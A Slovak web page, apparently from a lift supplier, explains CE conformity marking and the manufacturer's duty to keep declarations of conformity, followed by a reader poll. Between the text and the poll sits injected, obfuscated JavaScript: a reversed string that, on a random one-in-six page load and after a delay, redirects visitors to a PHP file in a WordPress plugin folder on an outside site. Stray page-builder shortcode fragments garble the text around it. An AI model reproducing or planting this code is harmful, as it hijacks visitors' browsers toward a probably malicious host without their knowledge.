Označenie CE (of franc. Conformité Européenne) vyjadruje, že výrobok spĺňa technické požiadavky stanovené vo všetkých nariadeniach vlády, ktoré sa na neho vzťahujú a ktoré toto označenie stanovujú alebo umožňujú, a že bol pri posúdení jeho zhody dodržaný stanovený postup.

Pri výrobkoch, ktoré sú v harmonizovanej sfére, nie je nutné zákazníkovi okrem návodu na použitie odovzdávať ďalšie dokumenty. Skutočnosť, že bola posúdená zhoda, označuje značka CE na výrobku. Výnimku tvoria niektoré výrobky, pri ktorých príslušné NV stanoví povinnosť odovzdať zákazníkovi niektoré ďalšie dokumenty (napr. ES Vyhlásenie o zhode). Pri neharmonizovanej sfére (napr. niektoré stavebné výrobky) sa výrobky značkou CE neoznačujú.

Vyhlásenie o zhode a doklady o použitom spôsobe posúdenia zhody je výrobca alebo dovozca povinný predkladať len orgánu dozoru (SOI). Túto povinnosť má výrobca alebo dovozca ešte 10 rokov po ukončení výroby alebo dovozu výrobku (tento čas môže byť nariadením vlády pri niektorých výrobkoch určený odlišne). Pokiaľ výrobca alebo dovozca poskytuje vyhlásenie o zhode aj ďalším osobám, nič neporušuje, ale túto povinnosť nemá. Výnimkou sú niektoré druhy výrobkov, napr. strojné zariadenia, kde príslušné NV stanovuje povinnosť vyhlásenie o zhode k výrobku priložiť.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_border=’av-border-thin‘ custom_width=’50px‘ custom_border_color=“ custom_margin_top=’30px‘ custom_margin_bottom=’30px‘ icon_select=’yes‘ custom_icon_color=“ icon=’ue808′ font=’entypo-fontello‘ av_uid=’av-39d7fs‘]

Loading

Ak by ste si mali vybrať nový výťah, rozhodnete sa pre ten s označením CE?

Ďakujeme za Váš hlas
Už ste hlasovali v tomto hlasovaní!
Vyberte možnosť